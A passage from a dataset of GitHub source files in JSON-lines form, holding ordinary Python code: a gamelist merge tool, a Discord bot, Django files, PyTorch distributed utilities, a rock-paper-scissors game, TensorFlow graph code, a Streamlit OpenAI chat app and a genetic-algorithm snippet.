entry.text.startswith('./'):\n\t\t\t\t\t\tif entry.tag == key:\n\t\t\t\t\t\t\tcopyRomFiles(src_path + entry.text[2:], 
out_path)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tcopyOverFileIfNeeded(src_path, entry.text, out_path, entry.text)\n\t\t\t\tcontinue\n\t\t\tif not rule:\n\t\t\t\tcontinue\n\n\t\t\t# do internal merge: choose baseline or source\n\t\t\tbl_game = game_dict[game_id]\n\t\t\tbl_info = {d.tag: d.text for d in bl_game}\n\t\t\tnew_info = {d.tag: d.text for d in game}\n\t\t\tfor k, v in new_info.items():\n\t\t\t\tif k not in bl_info: # for new field just add, cannot be ROM\n\t\t\t\t\te = ET.Element(k)\n\t\t\t\t\te.text = v\n\t\t\t\t\tif len(bl_game):\n\t\t\t\t\t\te.tail = bl_game[-1].tail\n\t\t\t\t\t\tbl_game[-1].tail = bl_game[0].tail\n\t\t\t\t\tbl_game.append(e)\n\t\t\t\t\tif v.startswith('./'):\n\t\t\t\t\t\tcopyOverFileIfNeeded(src_path, v, out_path, v)\n\t\t\t\t\tcontinue\n\t\t\t\tif v is None: # None will not overwrite anything\n\t\t\t\t\tcontinue\n\t\t\t\tif v.startswith('./'): # is a filename field\n\t\t\t\t\tvs = v[2:]\n\t\t\t\t\tbl_filesize = getFileSize(out_path+bl_game.find(k).text[2:])\n\t\t\t\t\tnew_filesize = getFileSize(src_path+vs)\n\t\t\t\t\tif bl_filesize != new_filesize:\n\t\t\t\t\t\tif k == key: # is ROM file\n\t\t\t\t\t\t\trule1 = rule.get(k, 'smaller')\n\t\t\t\t\t\t\tif (new_filesize>bl_filesize and rule1=='bigger') or (new_filesize', 'bigger'))\n\t\t\t\t\t\t\tif (new_filesize>bl_filesize and rule1=='bigger') or (new_filesize', 'longer'))\n\t\t\t\t\t\tif (new_strlen>bl_strlen and rule1=='longer') or (new_strlen ... [options] 1>output 2>progress',\n\t description = 'The world\\'s best program (up to today) for merging gamelist.xml (it can merge multiple game lists in one go)\\n'\n\t 'It can resolve duplicates both within the same gamelist.xml and across multiple gamelist.xml\\n'\n\t 'It can work on just the list files (gamelist.xml) only or together with the directory of all the files\\n'\n\t 'For input: you can keep different sources into different folders or lump everything into one single folder\\n'\n\t 'For output: you can modify resources inplace (same input/output ) or output to a different folder\\n'\n\t 'You can specify merge rules (or no internal merge), for string field keep \"longer\" or \"shorter\", for file keep \"bigger\" or \"smaller\"\\n'\n\t 'By default, it will keep longer string field (expect more detailed description), smaller ROM file (more efficient compression), bigger resource file (better resolution image/video)',\n\t formatter_class = argparse.ArgumentDefaultsHelpFormatter)\n\tparser.add_argument('output', help = 'output gamelist.xml file')\n\tparser.add_argument('sources', help = 'input gamelist.xml files, first file has the highest priority in the event of tie rule or no merge', nargs = '+')\n\tparser.add_argument('--key', '-k', help = 'the key field for distinguishing different games', default = 'path')\n\tparser.add_argument('--resource', '-r', help = 'transfer resource files (use the directory of gamelist.xml if and are not specified)', action = 'store_true')\n\tparser.add_argument('--norm', '-n', help = 'Python code for normalizing game names',\n\t default = 're.sub(r\" +\", \" \", re.sub(\"\\[.*\\]\", \"\", s.rsplit(\".\",1)[0].replace(\"!\", \"\").replace(\"(USA)\",\"(U)\").replace(\"(US)\",\"(U)\").replace(\"(Europe)\", \"(E)\"))).strip().lower()')\n\tparser.add_argument('--source-dir', '-sd', help = 'the root directory(ies) containing all the ROM/preview files, if present, resource files will be moved, if multiple are specified, its number must match that in ', default = [], nargs = '+')\n\tparser.add_argument('--output-dir', '-od', help = 'the 
output directory containing all the ROM/preview files, if present, resource files will be moved, can be the same as any <source-dir>', default = '')\n\tparser.add_argument('--mergerule', '-m', help = 'the merge rule, <file> refers to all filename fields, <str> refers to all non-filename fields, set to {} for no internal merge',\n\t default = \"{'path':'smaller', '<file>':'bigger', '<str>':'longer'}\")\n\t# nargs='?': optional positional argument; action='append': multiple instances of the arg; type=; default=\n\topt = parser.parse_args()\n\tglobals().update(vars(opt))\n\n\tif resource and not output_dir:\n\t\toutput_dir = os.path.dirname(output)\n\n\tif not source_dir:\n\t\tsource_dir = [os.path.dirname(src1) for src1 in sources] if resource else ['']*len(sources)\n\telif len(source_dir)==1:\n\t\tsource_dir = source_dir*len(sources)\n\telse:\n\t\tassert len(source_dir)==len(sources), 'Number of items in <source-dir> must match that in <sources> (or be 1 (the same for every <source>))'\n\n\trule = eval(mergerule)\n\tnormalize = lambda s: eval(norm)\n\n\tgamelist_merge(os.path.expanduser(output), [os.path.expanduser(fn) for fn in sources], normalize_dir(output_dir), [normalize_dir(p) for p in source_dir], rule)\n","repo_name":"xuancong84/public","sub_path":"RPi4/utils/gamelist-merge.py","file_name":"gamelist-merge.py","file_ext":"py","file_size_in_byte":11779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"39335920325","text":"import discord\nfrom discord.ext import commands\nimport requests\nimport json\n\nclass side_runners():\n\tdef get_quote(self):\n\t\tresponse = requests.get(\"https://zenquotes.io/api/random\")\n\t\tjson_data = json.loads(response.text)\n\n\t\tif \"Obtain an auth key for unlimited access. - zenquotes.io\" in json_data[0]['q']:\n\t\t\tembed = discord.Embed(\n\t\t\t\ttitle = \"Hey! 
slow down, or i shall be spinning too fast to exist :(\"\n\t\t\t)\n\t\t\tembed.set_author(name = self.user.name, icon_url = self.user.avatar_url)\n\t\telse:\n\t\t\tembed = discord.Embed(\n\t\t\t\ttitle = json_data[0]['a'],\n\t\t\t\tdescription = \"**{0}**\".format(json_data[0]['q'])\n\t\t\t)\n\t\t\tembed.set_thumbnail(url = \"https://i.postimg.cc/SRkM97Yh/quotes.jpg\")\n\n\t\treturn embed\n\nclass fun(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self._last_member = None\n\n @commands.command()\n async def quote(self, ctx):\n await ctx.send(embed = side_runners.get_quote(self.bot))\n\n @commands.command()\n async def mirror(self, ctx, message):\n await ctx.send(message)\n\n\ndef setup(bot):\n bot.add_cog(fun(bot))","repo_name":"imyashi0722/Pulsar-Discord.py","sub_path":"Functions/Fun/otherfuncommands.py","file_name":"otherfuncommands.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13788780509","text":"from django.urls import path, include\n\nfrom forexer.trade.views import (\n TradeListView,\n TradeCreateView,\n tradequote,\n available_currencies,\n)\n\n\nurlpatterns = [\n path('', TradeListView.as_view(), name='trade-listview'),\n path('create/', TradeCreateView.as_view(), name='trade-createview'),\n path('quote/', tradequote, name='trade-quote'),\n path('available-currencies/', available_currencies, name='trade-currencies'),\n]\n","repo_name":"zoliszeredi/forexer","sub_path":"src/forexer/trade/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14574545559","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('store', '0012_auto_20150510_2148'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='image',\n name='description',\n field=models.TextField(default='A lovely description'),\n preserve_default=True,\n ),\n ]\n","repo_name":"kentah/shop","sub_path":"store/migrations/0013_image_description.py","file_name":"0013_image_description.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8422475299","text":"#!/usr/bin/python\nimport sys\n#import argparse\n\nimport MkS\n\nif __name__ == '__main__':\n _version = '0.5.0'\n \n project = MkS.MkSProject()\n \n '''\n parser = argparse.ArgumentParser( description = 'A project source and package releaser.' 
)\n \n parser.add_argument( '-v', action='version', version='%(prog)s v{0}'.format( _version ) )\n \n parser.add_argument(\n '-name', dest = 'name',\n default = project.name,\n help = 'set the project name'\n )\n \n parser.add_argument(\n '-version', dest = 'version',\n default = project.version,\n help = 'set the project version'\n )\n \n parser.add_argument(\n '-company', dest = 'company',\n default = project.company,\n help = 'set the project company'\n )\n \n parser.add_argument(\n '-copyrights', dest = 'copyrights',\n default = project.copyrights,\n help = 'set the project copyrights'\n )\n \n parser.add_argument(\n '-description', dest = 'description',\n default = project.description,\n help = 'set the project description'\n )\n \n parser.add_argument(\n '-homepage', dest = 'homepage',\n default = project.urlHomepage,\n help = 'set the project homepage'\n )\n \n parser.add_argument(\n '-forums', dest = 'forums',\n default = project.urlForums,\n help = 'set the project forums'\n )\n \n parser.add_argument(\n '-issues', dest = 'issues',\n default = project.urlIssuesTracker,\n help = 'set the project issues'\n )\n '''\n \n '''parser.add_argument('integers', metavar='N', type=int, nargs='+',\n help='an integer for the accumulator')'''\n \n '''parser.add_argument('--sum', dest='accumulate', action='store_const',\n const=sum, default=max,\n help='sum the integers (default: find the max)')'''\n\n #args = parser.parse_args()\n \n #project.version = args.version\n \n project.run()\n sys.exit( 0 )\n","repo_name":"pasnox/monkeystudio2","sub_path":"tools/project_releaser/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"14832016399","text":"import dataclasses\nimport traceback\nfrom typing import Any, Callable, Container, Dict, List, Optional, OrderedDict, Tuple, TypeVar, overload\n\nimport torch\nimport torch.distributed as dist\nfrom torch import nn\nfrom torch.nn.parallel._functions import _get_stream\nfrom torch.nn.parallel.scatter_gather import _is_namedtuple\nfrom torch.nn.utils.rnn import PackedSequence\n\n__all__ = [] # type: ignore[var-annotated]\n\n\ndef _pack_kwargs(*args: Any, **kwargs: Any) -> Tuple[Tuple[Any, ...], Tuple[str, ...]]:\n \"\"\"\n Turn argument list into separate key list and value list (unpack_kwargs does the opposite)\n Inspiration: https://github.com/facebookresearch/fairscale/blob/eeb6684/fairscale/internal/containers.py#L70\n Usage::\n\n flat_args, kwarg_keys = pack_kwargs(1, 2, a=3, b=4)\n assert kwarg_keys == (\"a\", \"b\")\n assert flat_args == (1, 2, 3, 4)\n args, kwargs = unpack_kwargs(flat_args, kwarg_keys)\n assert args == (1, 2)\n assert kwargs == {\"a\": 3, \"b\": 4}\n Returns:\n Tuple[Tuple[Any, ...], Tuple[str, ...]]: The first tuple element\n gives both positional args and kwarg values, where the positional args\n precede kwarg values and kwarg values are ordered consistently with the\n kwarg keys. 
The second tuple element gives the kwarg keys.\n The second tuple element's length is at most the first tuple element's length.\n \"\"\"\n kwarg_keys: List[str] = []\n flat_args: List[Any] = list(args)\n for k, v in kwargs.items():\n kwarg_keys.append(k)\n flat_args.append(v)\n\n return tuple(flat_args), tuple(kwarg_keys)\n\ndef _cast_forward_inputs(\n dtype: Optional[torch.dtype],\n *args: Any,\n **kwargs: Any,\n) -> Tuple[Any, Any]:\n \"\"\"\n Casts floating point tensors in ``args`` and ``kwargs`` to ``input_dtype``.\n This respects the existing ``requires_grad`` on the tensors.\n \"\"\"\n if dtype is None:\n return args, kwargs\n\n def cast_fn(x: torch.Tensor) -> torch.Tensor:\n if not torch.is_floating_point(x) or x.dtype == dtype:\n return x\n return x.to(dtype)\n\n return (_apply_to_tensors(cast_fn, args), _apply_to_tensors(cast_fn, kwargs))\n\ndef _unpack_kwargs(flat_args: Tuple[Any, ...], kwarg_keys: Tuple[str, ...]) -> Tuple[Tuple[Any, ...], Dict[str, Any]]:\n \"\"\"See _pack_kwargs.\"\"\"\n assert len(kwarg_keys) <= len(\n flat_args\n ), f\"too many keys {len(kwarg_keys)} vs. {len(flat_args)}\"\n if len(kwarg_keys) == 0:\n return flat_args, {}\n args = flat_args[: -len(kwarg_keys)]\n kwargs = dict(zip(kwarg_keys, flat_args[-len(kwarg_keys) :]))\n return args, kwargs\n\n\nS = TypeVar(\"S\", dict, list, tuple)\nT = TypeVar(\"T\", torch.Tensor, PackedSequence)\n\n\n@overload\ndef _recursive_to(inputs: S, target_device: torch.device, use_side_stream_for_tensor_copies: bool) -> List[S]:\n ...\n\n\n@overload\ndef _recursive_to(inputs: T, target_device: torch.device, use_side_stream_for_tensor_copies: bool) -> Tuple[T]:\n ...\n\n\ndef _recursive_to(inputs, target_device, use_side_stream_for_tensor_copies):\n r\"\"\"\n Recursively moves input to the target_device.\n \"\"\"\n\n def to_map(obj):\n if isinstance(obj, (torch.Tensor, PackedSequence)):\n device = obj.data.device if isinstance(obj, PackedSequence) else obj.device\n if device == target_device:\n return (obj,)\n if not use_side_stream_for_tensor_copies:\n return (obj.to(target_device),)\n else:\n # If the custom module is not registered to torch, stream is not used for acceleration\n device_mod = getattr(torch, device.type, None)\n if device.type == \"cpu\" or device_mod is None:\n return (obj.to(target_device),)\n # Perform CPU -> target_device copies in a background stream. 
This code is\n # motivated from similar logic in torch/nn/parallel/_functions.py\n stream = _get_stream(target_device)\n with device_mod.stream(stream):\n output = obj.to(target_device)\n # synchronize with the copy stream\n with device_mod.device(target_device.index):\n current_stream = device_mod.current_stream()\n # Sync the current stream with the copy stream\n current_stream.wait_stream(stream)\n # Ensure tensor memory is not reused until work on\n # main stream is complete\n if isinstance(obj, PackedSequence):\n output.data.record_stream(current_stream) # type: ignore[arg-type]\n else:\n assert isinstance(output, torch.Tensor)\n output.record_stream(current_stream) # type: ignore[arg-type]\n return (output,)\n if _is_namedtuple(obj):\n return [type(obj)(*args) for args in zip(*map(to_map, obj))]\n if isinstance(obj, tuple) and len(obj) > 0:\n return list(zip(*map(to_map, obj)))\n if isinstance(obj, list) and len(obj) > 0:\n return [list(i) for i in zip(*map(to_map, obj))]\n if isinstance(obj, dict) and len(obj) > 0:\n return [type(obj)(i) for i in zip(*map(to_map, obj.items()))]\n return [obj]\n\n # Avoid reference cycle\n try:\n res = to_map(inputs)\n finally:\n to_map = None # type: ignore[assignment]\n return res\n\n\ndef _p_assert(cond: Any, s: str, raise_assertion_error: bool = True) -> None:\n \"\"\"This is used as an alternate to ``assert`` when in the backward context\n to print the error message ``s`` since otherwise, it is swallowed.\"\"\"\n if not cond:\n print(s)\n traceback.print_stack()\n if raise_assertion_error:\n raise AssertionError(s)\n\n\ndef _alloc_storage(tensor: torch.Tensor, size: torch.Size) -> None:\n \"\"\"\n Allocate storage for ``tensor`` with the given size.\n\n Returns:\n bool: ``True`` if this method allocated storage and ``False`` if the\n storage was already allocated.\n \"\"\"\n with torch.no_grad():\n already_allocated = tensor._typed_storage()._size() == size.numel()\n if not already_allocated:\n tensor_storage_size = tensor._typed_storage()._size()\n _p_assert(\n tensor_storage_size == 0,\n f\"Tensor storage should have been resized to be 0 but got {tensor_storage_size}\",\n )\n tensor._typed_storage()._resize_(size.numel())\n\n\n\ndef _free_storage(tensor: torch.Tensor) -> None:\n \"\"\"\n Frees the underlying storage of ``tensor``.\n\n Returns:\n bool: ``True`` if the method freed the storage and ``False`` if the\n storage was already freed.\n \"\"\"\n with torch.no_grad():\n already_freed = tensor._typed_storage()._size() == 0\n if not already_freed:\n _p_assert(\n tensor.storage_offset() == 0,\n \"Freeing a tensor's storage is unsafe when it is not the sole occupant\\n\"\n f\"storage offset: {tensor.storage_offset()}\\n\"\n f\"storage size: {tensor._typed_storage()._size()}\\n\"\n f\"tensor shape: {tensor.shape}\",\n )\n tensor._typed_storage()._resize_(0)\n\n\nQ = TypeVar(\"Q\")\nR = TypeVar(\"R\", dict, list, tuple, set, OrderedDict, PackedSequence, Any)\n\n\n@overload\ndef _apply_to_tensors(fn: Callable[[torch.Tensor], Q], container: torch.Tensor) -> Q:\n ...\n\n\n@overload\ndef _apply_to_tensors(fn: Callable[[torch.Tensor], Any], container: R) -> R:\n ...\n\n\ndef _apply_to_tensors(fn, container):\n \"\"\"Recursively apply to all tensor in different kinds of container types.\"\"\"\n\n def apply(x):\n if isinstance(x, torch.Tensor):\n return fn(x)\n elif hasattr(x, \"__dataclass_fields__\"):\n dc = dataclasses.replace(x)\n for f in dataclasses.fields(dc):\n name = f.name\n setattr(dc, name, apply(getattr(dc, name)))\n return dc\n elif 
isinstance(x, OrderedDict):\n od = x.__class__()\n for key, value in x.items():\n od[key] = apply(value)\n return od\n elif isinstance(x, PackedSequence):\n apply(x.data)\n return x\n elif isinstance(x, dict):\n return {key: apply(value) for key, value in x.items()}\n elif _is_namedtuple(x):\n res = (apply(el) for el in x)\n return type(x)(*res)\n elif isinstance(x, (list, tuple, set)):\n return type(x)(apply(el) for el in x)\n else:\n return x\n\n return apply(container)\n\n\ndef _to_kwargs(\n inputs: Tuple[Any, ...],\n kwargs: Optional[Dict[str, Any]],\n target_device: torch.device,\n use_side_stream_for_tensor_copies: bool,\n) -> Tuple[Tuple[Any, ...], Tuple[Dict[str, Any], ...]]:\n moved_inputs = (\n _recursive_to(inputs, target_device, use_side_stream_for_tensor_copies)\n if inputs\n else []\n )\n moved_kwargs = (\n _recursive_to(kwargs, target_device, use_side_stream_for_tensor_copies)\n if kwargs\n else []\n )\n if len(moved_inputs) < len(moved_kwargs):\n moved_inputs.extend([() for _ in range(len(moved_kwargs) - len(inputs))])\n elif len(moved_kwargs) < len(moved_inputs):\n moved_kwargs.extend([{} for _ in range(len(moved_inputs) - len(moved_kwargs))])\n return tuple(moved_inputs), tuple(moved_kwargs)\n\n\ndef _verify_param_shape_across_processes(\n process_group: dist.ProcessGroup, tensors: List[torch.Tensor], logger: Optional[dist.Logger] = None\n):\n return dist._verify_params_across_processes(process_group, tensors, logger)\n\n\ndef _sync_module_states(\n module: nn.Module,\n process_group: dist.ProcessGroup,\n broadcast_bucket_size: int,\n src: int,\n params_and_buffers_to_ignore: Container[str],\n broadcast_buffers: bool = True,\n) -> None:\n \"\"\"\n Syncs ``module``'s parameters and buffers state so that all ranks contain\n the same module state across all ranks. Note that this API assumes that all\n parameter shapes are consistent before running the synchronization. 
This can\n be checked with ``_verify_param_shape_across_processes``.\n \"\"\"\n module_states: List[torch.Tensor] = []\n for name, param in module.named_parameters():\n if name not in params_and_buffers_to_ignore:\n module_states.append(param.detach())\n\n if broadcast_buffers:\n for name, buffer in module.named_buffers():\n if name not in params_and_buffers_to_ignore:\n module_states.append(buffer.detach())\n\n _sync_params_and_buffers(process_group, module_states, broadcast_bucket_size, src)\n\n\ndef _sync_params_and_buffers(\n process_group: dist.ProcessGroup,\n module_states: List[torch.Tensor],\n broadcast_bucket_size: int,\n src: int,\n) -> None:\n \"\"\"\n Synchronizes ``module_states`` (list of tensors) across all processes by\n broadcasting them from rank 0.\n \"\"\"\n if len(module_states) > 0:\n dist._broadcast_coalesced(\n process_group, module_states, broadcast_bucket_size, src\n )\n\n\ndef _replace_by_prefix(\n state_dict: Dict[str, Any],\n old_prefix: str,\n new_prefix: str,\n) -> None:\n \"\"\"\n Replace all keys that match a given old_prefix with a new_prefix (in-place).\n\n Usage::\n\n state_dict = {\"layer.xyz\": torch.tensor(1)}\n replace_by_prefix_(state_dict, \"layer.\", \"module.layer.\")\n assert state_dict == {\"module.layer.xyz\": torch.tensor(1)}\n \"\"\"\n if old_prefix == new_prefix:\n raise ValueError(\"old_prefix and new_prefix must be distinct\")\n for key in list(state_dict.keys()):\n if not key.startswith(old_prefix):\n continue\n new_key = new_prefix + key[len(old_prefix) :]\n state_dict[new_key] = state_dict[key]\n del state_dict[key]\n","repo_name":"pytorch/pytorch","sub_path":"torch/distributed/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11967,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"4858515818","text":"rock = '''\n _______\n---' ____)\n (_____)\n (_____)\n (____)\n---.__(___)\n'''\n\npaper = '''\n _______\n---' ____)____\n ______)\n _______)\n _______)\n---.__________)\n'''\n\nscissors = '''\n _______\n---' ____)____\n ______)\n __________)\n (____)\n---.__(___)\n'''\n\n\nimport random\n\n###USER_SIDE###\n\nuser_choice = int(input(\"What do you choose? Type 0 for Rock, 1 for Paper or 2 for Scissors. \"))\n\nif user_choice == 0:\n print(rock)\n\nelif user_choice == 1:\n print(paper)\n\nelif user_choice ==2:\n print(scissors)\n\nelse:\n print(\"You typed an invalid number. You lose!\")\n\n###COMPUTER_SIDE###\n\ncomputer_choice = random.randint(0, 2)\n\nif user_choice >= 3 or user_choice < 0:\n print()\n\nelif computer_choice == 0:\n print(f\"Computer chose: {rock}\")\n\nelif computer_choice == 1:\n print(f\"Computer chose: {paper}\")\n\nelse:\n print(f\"Computer chose: {scissors}\")\n\n###RESULT###\n\nif user_choice == 0 and computer_choice == 0:\n print(\"It's a draw. Try again!\") \n\nelif user_choice == 0 and computer_choice == 1:\n print(\"You lost.\") \n\nelif user_choice == 0 and computer_choice == 2:\n print(\"You win! Congrats :D\") \n\nif user_choice == 1 and computer_choice == 0:\n print(\"You win! Congrats :D\") \n\nelif user_choice == 1 and computer_choice == 1:\n print(\"It's a draw. Try again!\") \n\nelif user_choice == 1 and computer_choice == 2:\n print(\"You lost.\")\n\nif user_choice == 2 and computer_choice == 0:\n print(\"You lost.\")\n\nelif user_choice == 2 and computer_choice == 1:\n print(\"You win! Congrats :D\") \n\nelif user_choice == 2 and computer_choice == 2:\n print(\"It's a draw. 
Try again!\") \n\n\n###ANSWER_RESULT###\n\n# if user_choice >= 3 or user_choice < 0:\n# print(\"You typed an invalid number, you lose!\")\n\n# elif user_choice == 0 and computer_choice == 2:\n# print(\"You win!\")\n\n# elif computer_choice == 0 and user_choice == 2:\n# print(\"You lose.\")\n\n# elif computer_choice > user_choice:\n# print(\"You lose.\")\n\n# elif user_choice > computer_choice:\n# print(\"You win!\")\n\n# elif computer_choice == user_choice:\n# print(\"It's a draw. Try again :D\")","repo_name":"ChiakiNL/Udemy","sub_path":"100Days_Python_Bootcamp/Day_04/Day4_Project_Rock_Paper_Scissors_Game.py","file_name":"Day4_Project_Rock_Paper_Scissors_Game.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5059959068","text":"import numpy as np\nimport tensorflow as tf\nfrom cells import propogation_Cell\nfrom utils import relu_init, tanh_init, zeros, const\n\n\nclass Network(object):\n\n def __init__(self, config):\n self.config = config\n self.global_step = tf.Variable(0, name=\"global_step\", trainable=False) # Epoch\n self.cell = None\n self.attn_values = tf.constant(0)\n self.gating_values = tf.constant(0)\n\n def variable_summaries(self):\n with tf.name_scope('summaries'):\n for k in tf.trainable_variables():\n name = '-'.join(k.name.split('/')[-2:])\n tf.summary.histogram(name, k)\n\n def get_path_data(self, x_attr, x_lengths, keep_prob_in, keep_prob_out, path_matrix, state=None):\n\n steps, batch_size = tf.shape(x_attr)[0], tf.shape(x_attr)[1]\n num_units = self.config.mRNN._hidden_size\n\n # Sparse drop used outside tensor graph\n # with tf.variable_scope('InputDropout'):\n # x_attr = tf.nn.dropout(x_attr, keep_prob_in)\n\n with tf.variable_scope('MyCell') as scope:\n inputs = tf.split(x_attr, num_or_size_splits=self.config.num_steps, axis=0)\n path_matrix = tf.split(path_matrix, num_or_size_splits=self.config.num_steps, axis=0)\n\n cell = propogation_Cell(self.config)\n state = (tf.zeros((batch_size, num_units)), tf.zeros((batch_size, num_units)))\n for tstep in range(len(inputs)):\n if tstep == len(inputs) - 1:\n state, labels, self.attn_values, self.gating_values = cell.__call__(inputs[tstep][0], state, path_matrix[tstep][0], keep_prob_in, keep_prob_out,\n get_labels=True)\n else:\n state = cell.__call__(inputs[tstep][0], state, path_matrix[tstep][0], keep_prob_in, keep_prob_out,\n get_labels=False)\n scope.reuse_variables()\n\n return state, labels\n\n def consensus_loss(self, predictions, pred_mean):\n pred_mean = tf.reduce_mean(predictions)\n cross_loss = -1*tf.reduce_mean(tf.multiply(pred_mean, tf.log(1e-10 + predictions)))\n return cross_loss\n\n def loss(self, predictions, labels, wce):\n if self.config.data_sets._multi_label:\n cross_loss = tf.add(tf.log(1e-10 + predictions) * labels,\n tf.log(1e-10 + (1 - predictions)) * (1 - labels))\n cross_entropy_label = -1 * tf.reduce_mean(tf.reduce_sum(wce * cross_loss, 1))\n else:\n cross_loss = labels * tf.log(predictions + 1e-10)\n cross_entropy_label = tf.reduce_mean(-tf.reduce_sum(wce * cross_loss, 1))\n\n return cross_entropy_label\n\n def L2loss(self):\n # wts = ['W_xh', 'W_hh', 'W_L']\n # with tf.variable_scope('L2_loss'):\n # if self.config.solver._L2loss:\n # L2_loss = tf.add_n([tf.nn.l2_loss(v) if v.name.split('/')[-1].split(':')[0] in wts else tf.constant(0.0)\n # for v in tf.trainable_variables()])\n with tf.variable_scope('L2_loss'):\n if self.config.solver._L2loss:\n L2_loss = tf.add_n([tf.nn.l2_loss(v) for v 
in tf.trainable_variables()])\n return L2_loss\n\n def training(self, loss, optimizer):\n train_op = optimizer.minimize(loss[0])\n return train_op\n\n def custom_training(self, loss, optimizer, batch_size):\n\n # gradient accumulation over multiple batches\n # http://stackoverflow.com/questions/42156957/how-to-update-model-parameters-with-accumulated-gradients\n # https://github.com/DrSleep/tensorflow-deeplab-resnet/issues/18#issuecomment-279702843\n #batch_size = tf.Print(batch_size, [batch_size], message=\"Batch size: \")\n with tf.variable_scope('custom_training'):\n\n tvs = tf.trainable_variables()\n accum_grads = [tf.Variable(tf.zeros_like(tv.initialized_value()), trainable=False) for tv in tvs]\n reset_op = [v.assign(tf.zeros_like(v)) for v in accum_grads]\n\n gvs = tf.gradients(loss, tvs) # compute gradients\n accum_op = [accum_grads[i].assign_add(gv) for i, gv in enumerate(gvs)] # accumulate computed gradients\n\n normalized_grads = [var/batch_size for var in accum_grads]\n update_op = optimizer.apply_gradients(zip(normalized_grads, tvs))\n\n return reset_op, accum_op, update_op\n\n\n\n\n\n","repo_name":"PriyeshV/GAP_Kernels_DFS","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12676573013","text":"\r\ndef app():\r\n\r\n import streamlit as st\r\n from streamlit_chat import message\r\n import os\r\n import openai\r\n from dotenv import load_dotenv\r\n\r\n load_dotenv()\r\n openai.api_key = os.getenv('OPEN_API')\r\n \r\n st.balloons()\r\n\r\n\r\n if \"key\" not in st.session_state:\r\n st.session_state[\"key\"]=[]\r\n st.session_state[\"value\"]=[]\r\n\r\n def update_first():\r\n st.session_state[\"key\"].append(title)\r\n st.session_state[\"value\"].append(True)\r\n\r\n def update_second(value):\r\n st.session_state[\"key\"].append(value)\r\n st.session_state[\"value\"].append(False)\r\n\r\n st.header('Cheri AI created by Dr.Sherwin Roger :purple_heart:')\r\n\r\n container = st.container()\r\n\r\n form = st.form(key='form')\r\n title=form.text_input(label='Enter some text')\r\n form.form_submit_button(label='Submit',on_click=update_first,type='secondary')\r\n\r\n with container:\r\n\r\n if title:\r\n for i,j in zip(st.session_state[\"key\"],st.session_state[\"value\"]):\r\n\r\n if i!='':\r\n if j==True:\r\n message(str(i),is_user=j,key=str(os.urandom(16).hex()))\r\n else:\r\n st.code(i)\r\n\r\n response = openai.Completion.create(\r\n prompt=title,\r\n model=\"text-davinci-003\",\r\n temperature=0.5,\r\n max_tokens=2000,\r\n top_p=1,\r\n frequency_penalty=1,\r\n presence_penalty=1\r\n )\r\n if title=='hi' or title==\"Hi\":\r\n response.choices[0].text=\"hello\"\r\n update_second(str(response.choices[0].text))\r\n st.code(response.choices[0].text)\r\n message(title,is_user=True,key=str(os.urandom(16).hex()))\r\n\r\n\r\n sound = st.empty()\r\n sound.audio(\"hello.mp3\")\r\n","repo_name":"sherwin-roger0/Cheri-GPT","sub_path":"app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29201412665","text":"from typing import List\n\nfrom path import Path\nfrom crossingover import get_children\nfrom mutation import swap, swap_neighbor, insert, reverse\nimport time\nimport random\n\n\nclass Population:\n parents: List[Path] = []\n children: List[Path] = []\n parents_length = 0\n\n def __init__(self, parent_count: 
int): # Creates parent_count parents and (parent_count x 2) children per generation\n self.parents = []\n self.children = []\n self.parents_length = parent_count\n\n for i in range(self.parents_length):\n self.parents.append(Path.get_random_path())\n\n self.print_paths(True, False)\n\n def print_paths(self, is_print_parents: bool, is_print_children: bool):\n\n if is_print_parents:\n print(\"parents:\")\n for i in range(self.parents_length):\n print(f\"{i:02d}\", self.parents[i].cities, \"cost: \", self.parents[i].cost)\n print(\"\\n\")\n\n if is_print_children:\n print(\"children:\")\n for i in range(len(self.children)):\n print(f\"{i:02d}\", self.children[i].cities, \"cost: \", self.children[i].cost)\n print(\"\\n\")\n\n def iteration(self, iteration_count):\n\n for i in range(iteration_count):\n self.children.clear()\n self.children.extend(get_children(self.parents))\n\n def create_new_children(self):\n\n random.shuffle(self.parents)\n self.children = []\n length = int(self.parents_length / 2)\n for i in range(length):\n self.children.extend(get_children(self.parents[2 * i % self.parents_length], self.parents[2 * i % self.parents_length + 1]))\n #random.shuffle(self.parents)\n self.children.extend(get_children(self.parents[2 * i % self.parents_length], self.parents[2 * i % self.parents_length + 1]))\n\n def select_new_parents(self):\n for i in range(self.parents_length):\n if self.children[i].cost < self.parents[i].cost:\n is_new = True\n for j in range(self.parents_length):\n if self.children[i].cities == self.parents[j].cities:\n is_new = False\n break\n if is_new:\n self.parents[i].set_cities(self.children[i].cities)\n\n def get_mutation_children(self):\n for i in range(len(self.children)):\n swap(self.children[i])\n\n\nstart = time.time()\n\npop0 = Population(10)\n\nfor i in range(20000):\n pop0.create_new_children()\n pop0.select_new_parents()\n # pop0.get_mutation_children()\n # pop0.select_new_parents()\n # pop0.print_paths(True, 